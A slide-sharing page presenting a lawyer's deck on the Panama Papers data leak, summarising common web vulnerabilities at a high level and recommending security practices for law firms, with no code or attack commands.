ITSolutions|Currie Network Security Seminar
 
Protecting Your Business From Cybercrime
Protecting Your Business From CybercrimeProtecting Your Business From Cybercrime
Protecting Your Business From Cybercrime
 
Info Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsInfo Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study Jams
 
attack vectors by chimwemwe.pptx
attack vectors by chimwemwe.pptxattack vectors by chimwemwe.pptx
attack vectors by chimwemwe.pptx
 
Lock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM iLock it Down: Access Control for IBM i
Lock it Down: Access Control for IBM i
 

More from Adv. Prashant Mali ♛ [Bsc(Phy),MSc(Comp Sci), CCFP,CISSA,LLM]

Legality of bitcoins by Prashant Mali
Legality of bitcoins by Prashant MaliLegality of bitcoins by Prashant Mali
Legality of bitcoins by Prashant Mali
Adv. Prashant Mali ♛ [Bsc(Phy),MSc(Comp Sci), CCFP,CISSA,LLM]
 
Electronic Evidence with Case Laws for Maharashtra Judicial Academy by Prasha...
Electronic Evidence with Case Laws for Maharashtra Judicial Academy by Prasha...Electronic Evidence with Case Laws for Maharashtra Judicial Academy by Prasha...
Electronic Evidence with Case Laws for Maharashtra Judicial Academy by Prasha...
Adv. Prashant Mali ♛ [Bsc(Phy),MSc(Comp Sci), CCFP,CISSA,LLM]
 
Ecommerce GST and tax laws in India by prashant mali
Ecommerce GST and tax laws in India by prashant maliEcommerce GST and tax laws in India by prashant mali
Ecommerce GST and tax laws in India by prashant mali
Adv. Prashant Mali ♛ [Bsc(Phy),MSc(Comp Sci), CCFP,CISSA,LLM]
 
Ransomware : A cyber crime without solution ? by Prashant Mali
Ransomware : A cyber crime without solution ? by Prashant MaliRansomware : A cyber crime without solution ? by Prashant Mali
Ransomware : A cyber crime without solution ? by Prashant Mali
Adv. Prashant Mali ♛ [Bsc(Phy),MSc(Comp Sci), CCFP,CISSA,LLM]
 
VAPT, Ethical Hacking and Laws in India by prashant mali
VAPT, Ethical Hacking and Laws in India by prashant maliVAPT, Ethical Hacking and Laws in India by prashant mali
VAPT, Ethical Hacking and Laws in India by prashant mali
Adv. Prashant Mali ♛ [Bsc(Phy),MSc(Comp Sci), CCFP,CISSA,LLM]
 

More from Adv. Prashant Mali ♛ [Bsc(Phy),MSc(Comp Sci), CCFP,CISSA,LLM] (8)

Legality of bitcoins by Prashant Mali
Legality of bitcoins by Prashant MaliLegality of bitcoins by Prashant Mali
Legality of bitcoins by Prashant Mali
 
Electronic Evidence with Case Laws for Maharashtra Judicial Academy by Prasha...
Electronic Evidence with Case Laws for Maharashtra Judicial Academy by Prasha...Electronic Evidence with Case Laws for Maharashtra Judicial Academy by Prasha...
Electronic Evidence with Case Laws for Maharashtra Judicial Academy by Prasha...
 
Ecommerce GST and tax laws in India by prashant mali
Ecommerce GST and tax laws in India by prashant maliEcommerce GST and tax laws in India by prashant mali
Ecommerce GST and tax laws in India by prashant mali
 
Ransomware : A cyber crime without solution ? by Prashant Mali
Ransomware : A cyber crime without solution ? by Prashant MaliRansomware : A cyber crime without solution ? by Prashant Mali
Ransomware : A cyber crime without solution ? by Prashant Mali
 
VAPT, Ethical Hacking and Laws in India by prashant mali
VAPT, Ethical Hacking and Laws in India by prashant maliVAPT, Ethical Hacking and Laws in India by prashant mali
VAPT, Ethical Hacking and Laws in India by prashant mali
 
zero day exploits
zero day exploitszero day exploits
zero day exploits
 
Privacy and Privacy Law in India By Prashant Mali
Privacy and Privacy Law in India By Prashant MaliPrivacy and Privacy Law in India By Prashant Mali
Privacy and Privacy Law in India By Prashant Mali
 
Panama-Paper-Leak
Panama-Paper-LeakPanama-Paper-Leak
Panama-Paper-Leak
 

Recently uploaded

办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
9ib5wiwt
 
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdfXYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
bhavenpr
 
How to Obtain Permanent Residency in the Netherlands
How to Obtain Permanent Residency in the NetherlandsHow to Obtain Permanent Residency in the Netherlands
How to Obtain Permanent Residency in the Netherlands
BridgeWest.eu
 
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
9ib5wiwt
 
Rokita Releases Soccer Stadium Legal Opinion
Rokita Releases Soccer Stadium Legal OpinionRokita Releases Soccer Stadium Legal Opinion
Rokita Releases Soccer Stadium Legal Opinion
Abdul-Hakim Shabazz
 
Ease of Paying Tax Law Republic Act 11976
Ease of Paying Tax Law Republic Act 11976Ease of Paying Tax Law Republic Act 11976
Ease of Paying Tax Law Republic Act 11976
PelayoGilbert
 
ADR in criminal proceeding in Bangladesh with global perspective.
ADR in criminal proceeding in Bangladesh with global perspective.ADR in criminal proceeding in Bangladesh with global perspective.
ADR in criminal proceeding in Bangladesh with global perspective.
Daffodil International University
 
Highlights_of_Bhartiya_Nyaya_Sanhita.pptx
Highlights_of_Bhartiya_Nyaya_Sanhita.pptxHighlights_of_Bhartiya_Nyaya_Sanhita.pptx
Highlights_of_Bhartiya_Nyaya_Sanhita.pptx
anjalidixit21
 
Secure Your Brand: File a Trademark Today
Secure Your Brand: File a Trademark TodaySecure Your Brand: File a Trademark Today
Secure Your Brand: File a Trademark Today
Trademark Quick
 
Car Accident Injury Do I Have a Case....
Car Accident Injury Do I Have a Case....Car Accident Injury Do I Have a Case....
Car Accident Injury Do I Have a Case....
Knowyourright
 
new victimology of indonesian law. Pptx.
new victimology of indonesian law. Pptx.new victimology of indonesian law. Pptx.
new victimology of indonesian law. Pptx.
niputusriwidiasih
 
Military Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
Military Commissions details LtCol Thomas Jasper as Detailed Defense CounselMilitary Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
Military Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
Thomas (Tom) Jasper
 
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
9ib5wiwt
 
Debt Mapping Camp bebas riba to know how much our debt
Debt Mapping Camp bebas riba to know how much our debtDebt Mapping Camp bebas riba to know how much our debt
Debt Mapping Camp bebas riba to know how much our debt
ssuser0576e4
 
The Reserve Bank of India Act, 1934.pptx
The Reserve Bank of India Act, 1934.pptxThe Reserve Bank of India Act, 1934.pptx
The Reserve Bank of India Act, 1934.pptx
nehatalele22st
 
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
o6ov5dqmf
 
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdfDaftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
akbarrasyid3
 
Roles of a Bankruptcy Lawyer John Cavitt
Roles of a Bankruptcy Lawyer John CavittRoles of a Bankruptcy Lawyer John Cavitt
Roles of a Bankruptcy Lawyer John Cavitt
johncavitthouston
 
The Main Procedures for Obtaining Cypriot Citizenship
The Main Procedures for Obtaining Cypriot CitizenshipThe Main Procedures for Obtaining Cypriot Citizenship
The Main Procedures for Obtaining Cypriot Citizenship
BridgeWest.eu
 
Responsibilities of the office bearers while registering multi-state cooperat...
Responsibilities of the office bearers while registering multi-state cooperat...Responsibilities of the office bearers while registering multi-state cooperat...
Responsibilities of the office bearers while registering multi-state cooperat...
Finlaw Consultancy Pvt Ltd
 

Recently uploaded (20)

办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
办理(waikato毕业证书)新西兰怀卡托大学毕业证双学位证书原版一模一样
 
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdfXYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
XYZ-v.-state-of-Maharashtra-Bombay-HC-Writ-Petition-6340-2023.pdf
 
How to Obtain Permanent Residency in the Netherlands
How to Obtain Permanent Residency in the NetherlandsHow to Obtain Permanent Residency in the Netherlands
How to Obtain Permanent Residency in the Netherlands
 
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
原版仿制(aut毕业证书)新西兰奥克兰理工大学毕业证文凭毕业证雅思成绩单原版一模一样
 
Rokita Releases Soccer Stadium Legal Opinion
Rokita Releases Soccer Stadium Legal OpinionRokita Releases Soccer Stadium Legal Opinion
Rokita Releases Soccer Stadium Legal Opinion
 
Ease of Paying Tax Law Republic Act 11976
Ease of Paying Tax Law Republic Act 11976Ease of Paying Tax Law Republic Act 11976
Ease of Paying Tax Law Republic Act 11976
 
ADR in criminal proceeding in Bangladesh with global perspective.
ADR in criminal proceeding in Bangladesh with global perspective.ADR in criminal proceeding in Bangladesh with global perspective.
ADR in criminal proceeding in Bangladesh with global perspective.
 
Highlights_of_Bhartiya_Nyaya_Sanhita.pptx
Highlights_of_Bhartiya_Nyaya_Sanhita.pptxHighlights_of_Bhartiya_Nyaya_Sanhita.pptx
Highlights_of_Bhartiya_Nyaya_Sanhita.pptx
 
Secure Your Brand: File a Trademark Today
Secure Your Brand: File a Trademark TodaySecure Your Brand: File a Trademark Today
Secure Your Brand: File a Trademark Today
 
Car Accident Injury Do I Have a Case....
Car Accident Injury Do I Have a Case....Car Accident Injury Do I Have a Case....
Car Accident Injury Do I Have a Case....
 
new victimology of indonesian law. Pptx.
new victimology of indonesian law. Pptx.new victimology of indonesian law. Pptx.
new victimology of indonesian law. Pptx.
 
Military Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
Military Commissions details LtCol Thomas Jasper as Detailed Defense CounselMilitary Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
Military Commissions details LtCol Thomas Jasper as Detailed Defense Counsel
 
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
1比1制作(swansea毕业证书)英国斯旺西大学毕业证学位证书托业成绩单原版一模一样
 
Debt Mapping Camp bebas riba to know how much our debt
Debt Mapping Camp bebas riba to know how much our debtDebt Mapping Camp bebas riba to know how much our debt
Debt Mapping Camp bebas riba to know how much our debt
 
The Reserve Bank of India Act, 1934.pptx
The Reserve Bank of India Act, 1934.pptxThe Reserve Bank of India Act, 1934.pptx
The Reserve Bank of India Act, 1934.pptx
 
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
一比一原版麻省理工学院毕业证(MIT毕业证)成绩单如何办理
 
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdfDaftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
Daftar Rumpun, Pohon, dan Cabang Ilmu (28 Mei 2024).pdf
 
Roles of a Bankruptcy Lawyer John Cavitt
Roles of a Bankruptcy Lawyer John CavittRoles of a Bankruptcy Lawyer John Cavitt
Roles of a Bankruptcy Lawyer John Cavitt
 
The Main Procedures for Obtaining Cypriot Citizenship
The Main Procedures for Obtaining Cypriot CitizenshipThe Main Procedures for Obtaining Cypriot Citizenship
The Main Procedures for Obtaining Cypriot Citizenship
 
Responsibilities of the office bearers while registering multi-state cooperat...
Responsibilities of the office bearers while registering multi-state cooperat...Responsibilities of the office bearers while registering multi-state cooperat...
Responsibilities of the office bearers while registering multi-state cooperat...
 

Panama Papers Leak and Precautions Law firms should take

  • 1. An expose by Lawyers ! What to learn from the Panama Papers Leak Adv. Prashant Mali 1Advocate Prashant Mali (www.prashantmali.com)
  • 2. The Background • Data breach at , a Panamian law firm is being touted as the largest ever, in terms of the sheer volume of information leaked. • The leaked information allegedly details the ways dozens of high-ranking politicians, their relatives or close associates in more than 50 countries, including U.K., France, Russia, China and India, have used offshore companies to hide income and avoid paying taxes. 2Advocate Prashant Mali (www.prashantmali.com)
  • 3. The Numbers • Reportedly cover 11.5 million confidential documents dating from 1970s to late 2015. • The 2.6 terabytes of leaked data includes: 4.8 million emails 3 million database files 2.2 million PDFs 1.1 million images 320,000 text documents 3Advocate Prashant Mali (www.prashantmali.com)
  • 4. How did the Leak happen? • The leak stems from an email hack • An email server attack could have happened in multiple ways • The firm’s client portal found vulnerable to the DROWN vulnerability, which was using the old, deprecated SSLv2 encryption protocol on servers 4Advocate Prashant Mali
  • 5. How did the Leak happen? • Portal was using the open source Drupal Content Management System (CMS) which was outdated and not updated since two years. • This outdated CMS version on the portal was vulnerable to SQL injection which generally, responsible for 97% of the data breaches across the world. • Other application layer vulnerabilities on the portal were Cross Site Scripting, Cross Sight Request Forgery, and Brute Force Bypass, etc. 5Advocate Prashant Mali (www.prashantmali.com)
  • 6. How did the Leak happen? • Security researchers have claimed that certain backend portions of the site were also accessible with simple commands that any high school hacker could have guessed. • Even the Microsoft’s Outlook at Mossack Fonseca was last updated seven years back in 2009. • The emails were not even encrypted which made incredibly easy for hackers to get admin level privileges with such application and system level security standards 6Advocate Prashant Mali (www.prashantmali.com)
  • 7. 1. Injection • It happens when account login page does not filter user inputs correctly. • Hackers can use commands to enter through this and claim legitimate access. • Moreover, they can use anything from sign-in forms to comments box and send commands to the server. • Business risk: Hackers have direct way of interacting with the server • They can steal data, change it, delete it, deny access and do much more! • In fact, injection attacks such as SQL Injection are allegedly responsible for major data breaches at Ashley Madison and Sony 7Advocate Prashant Mali (www.prashantmali.com)
  • 8. 2. Broken Authentication & Session Management • Negligence in customer accounts, password recovery and even sessions can lead to increased security risks • Essential to have high degree of control over account log-in using unique user ID and password • Business risk: Hackers are allowed to claim complete account access. • In severe cases, stolen database records are sold to underground black market 8Advocate Prashant Mali (www.prashantmali.com)
  • 9. 3. Cross-site Scripting • The most common vulnerability – with this weakness, attackers could use web applications to send malicious script to a user’s browser • Poses threat to both, users and website • Hackers basically intercept communication between server & browser to inject malicious codes at both ends. • Cross-Site Scripting not only harms the website but also allows attacks to redirect users to any other URL • Business risk: Hackers can change the homepage of the website, inject malware on the site • Usually leads to websites getting blocked by search engines and browsers! 9Advocate Prashant Mali
  • 10. 4. Insecure Direct Object References • This vulnerability can be seen when we simply change a few numbers in URL and press enter and thereby allowed to access unprivileged data because the numbers were predictable • Multiple predictable patterns that will allow hackers to get into database and access restricted data • Business risk: An attacker can access and expose a lot of data • Security is compromised, although, he cannot make many changes 10Advocate Prashant Mali
  • 11. 5. Security Misconfiguration • Misconfigured security is a tough vulnerability to handle as it takes into account all security lapses at every level of the application • Most system admins ignore changing their passwords or even disabling ports and accounts they do not use anymore • Attackers look for such small lapses, combine them, and try to make something big out of it • Business risk: Can lead to complete loss of data through alteration, deletion and theft • Attackers can use one vulnerability after the other to access the database 11Advocate Prashant Mali
  • 12. 6. Sensitive Data Exposure • Data should be stored or transmitted only by encrypting it with cryptographic algorithms • It ensures that even if the passwords or credit card details are stolen, hackers cannot do anything with it • Critical to keep the data encrypted in such a way that only authorized keys or algorithms unlock it • Business risk: Loss of sensitive data, passwords, credit card information, addresses and bank statements • May have serious repercussions on credibility 12Advocate Prashant Mali (www.prashantmali.com)
  • 13. 7. Missing Function Level Access Control • Admin function controls are the most important ones and should be restricted • Most companies do not bother reassuring that only authorized accounts access privileged information. • Business risk: Once the attacker gains admin access, he can change a lot things including application data and settings • Serious tangible and intangible consequences and loss of credibility 13Advocate Prashant Mali (www.prashantmali.com)
  • 14. 8. Cross-Site Request Forgery (CSRF) • It is the case of malicious link hidden in an image on the random website that is visited by the customer • Fraudsters alter the URL for the customer to initiate a command that the customer doesn’t even know about • Business risk: There would be random requests, purchases, and money transfers • One could never be sure about its genuinity and customers will gradually lose trust in the website 14Advocate Prashant Mali (www.prashantmali.com)
  • 15. 9. Using Components with Known Vulnerabilities • Sometimes application developers use open source projects with unknown loopholes like unknown application codes • Business risk: Unknown application codes brings unknown risks • Cross-site scripting, injection risks and business logic loopholes are just some of the examples • Such vulnerability brings data breach, access control, defacements and theft risks 15Advocate Prashant Mali (www.prashantmali.com)
  • 16. 10. Invalidated Redirects and Forwards • Customer is taken to a website which looks exactly like the one he wants, but, it is not the same! Fraudsters can get the information needed through it • Most websites don’t even know about such unauthorized redirects that look genuine • Customers should be more careful about phishing. However, its not possible for a customer to know whether he is redirected to a wrong website or not. Onus is on website owner! • Business risk: Attackers can install malware or access user accounts with phishing • Customers lose trust in attacked website forever 16Advocate Prashant Mali (www.prashantmali.com)
  • 17. Solutions for such Attacks • A complete web application security solution is needed – to detect, protect and monitor various attacks • Total Application Security (TAS) is industry’s integrated web application security and compliance solution • It helps organizations to detect application layer vulnerabilities accurately, patch them instantly without any change in code, and continuously monitor for emerging threats and DDoS attacks to mitigate them • TAS does this accurately with web application scanning (detect), patches them instantly with web application firewall (protect), and monitors traffic continuously for emerging threats and DDoS attacks (monitor) • Also includes 24x7 managed service support to perform pen testing, create custom rules, and maintain zero false positives 17Advocate Prashant Mali (www.prashantmali.com)
  • 18. Ensure Data Security at your Law firm • Up to now, the only entities that seemed concerned with data security were large corporations and health care organizations • With reports of security breaches making headline news on a weekly basis, data security has become top-of-mind for every business and for every person who carries and uses a credit card • The threat of a data breach attack is a risk for law firms, too • The threat is reason enough to enact more stringent security policies, but there is another compelling reason: the security requirements of your own clients • Small law firms might think that they are not a target, but even they have clients with desirable data. It could even be that your law firm is a much easier target than a corporate entity • It’s a problem law firms cannot ignore, no matter their size 18Advocate Prashant Mali (www.prashantmali.com)
  • 19. What can Law firms of any size do to better manage Cyber security ? 19Advocate Prashant Mali (www.prashantmali.com)
  • 20. Control Chaos • If you need to make changes to security, the changes should be implemented in a way that does not impede attorney’s abilities to perform work for clients. • Your firm should balance the need to protect client data and the need to access it. • Consider the remediation steps for preventing the Crypto-Locker virus. You can lock down the firm’s firewalls, desktops and email, but if done in an overly aggressive manner the changes could have potentially negative side effects such as users cannot upload to court websites; one-off application like those common for litigation, may fail; email scanning false positives caused missed email, etc. • With planning, training, proper advance notification and staggering the change among users, the side effects can be minimized. 20Advocate Prashant Mali
  • 21. Prepare, Plan and Train • Disruptions in productivity can be avoided through careful technology selection, planning and preparation. • These days, maintaining a current firewall is not enough protection. Select the most appropriate security systems that provide the best mix of ease of use and security • Implement new systems and procedures only after they are vetted and tested by a small group of users • Prepare new users by giving them advance notice and creating a training plan that covers the topics in a language they understand. • Security awareness training is designed to increase end user’s awareness of the firm’s security policies and potential threats to the firm, and to increase their willingness to adhere to the firm’s security requirements. • It is probably the most important step to preventing incidents, such as the Crypto-Locker virus that has infected numerous law firms in the last few months. 21Advocate Prashant Mali
  • 22. You should plan to cover • Electronic communications • Incident reporting • Internet access • Mobile device security • Password policies • Remote access • Social media use • The firm’s Acceptable Use Policy • Visitor policies • Wireless access security 22Advocate Prashant Mali (www.prashantmali.com)
  • 23. Verify Your Vendors • Your firm’s vendors must also follow proper security protocols • Vendors, especially those hosting your data in the cloud, need to pay particular attention to securing and protecting your data • Review every vendor’s commitment to protecting your data, as well as their security certifications and policies 23Advocate Prashant Mali (www.prashantmali.com)
  • 24. Monitor Your Systems • Every firm should employ top-notch antivirus, antispam, malware and intrusion detection • Manage these critical systems to ensure that protection is active (e.g., not disabled by the end users) and up to date • Routinely check firewall logs. These will highlight the extent to which your users are under attack and make you aware of administrative access and changes to your firewall • Periodically check the firewall configuration for unwanted changes. • You also should manage and monitor user accounts and scan for user accounts that have not been accessed for a period of time, stale passwords and membership in administrative groups • Every IT administrator has added users to high-level security groups, such as domain administrators, in order to test and troubleshoot issues only to accidentally leave them in groups where they do not belong. 24Advocate Prashant Mali
  • 25. Make System Entry Difficult • Law firms of all sizes should be using two-factor authentication • Two-factor authentication requires two things from a user before they are allowed to access a system: something the user has and something the user knows • The item the user has is a token, either a physical token or an application on a smartphone • The thing the user knows is his password or PIN • Together, these items provide a significant increase in the security of systems accessed remotely. 25Advocate Prashant Mali (www.prashantmali.com)
  • 26. Prioritize Physical Security • Physical security is also important • Server room doors and cabinets should be locked when possible • You also may want to consider investing in an affordable security camera system that includes options for recording physical access. • Stored data should be encrypted • Consider implementing a clean-and-clear desk policy, which requires everyone to log off of their computers when not using them and to lock computers when they walk away • The policy should extend to laptops and other data storage devices, which should be locked when the employee is not present • No data, either printed or electronic, should be left unattended 26Advocate Prashant Mali (www.prashantmali.com)
  • 27. Engage 3rd Party for Security Audits • After you’ve determined your new policies, put new systems and protections in place and trained your end users, you should consider bringing in a third party • Someone not regularly involved with the firm’s day- to-day IT needs to perform a security analysis • An outside security expert will perform a top- down evaluation of your systems, security policies and practices, and will review physical access to the systems 27Advocate Prashant Mali (www.prashantmali.com)
  • 28. Try to Break In • A penetration test is the process of trying to break into a system in order to identify any vulnerability • A pen test has to be executed with care, because if it is performed recklessly it can cause system or network damage through buffer overflows, Denial of Service (DoS) attacks and misconfiguration of systems • Strive to repeat pen tests at least annually or with more frequency • If you change your firewall or other major systems throughout the year, you should repeat a pen test 28Advocate Prashant Mali (www.prashantmali.com)
  • 29. Remediate Carefully • At the end of a security audit or pen test, you will receive a remediation plan • The IT department should carefully review the recommended changes before implementation to consider any possible adverse effects on other systems and end users • Some believe that threats are irrelevant for small firms, but nothing could be further from the truth! • It is increasingly common for clients of law firms to dictate security requirements, so all firms should make strengthening security policies a top priority 29Advocate Prashant Mali (www.prashantmali.com)
  • 30. THANK YOU ADV. PRASHANT MALI Email: cyberlawconsulting@gmail.com Web site: www.prashantmali.com Twitter : @CyberMahaGuru 30Advocate Prashant Mali (www.prashantmali.com)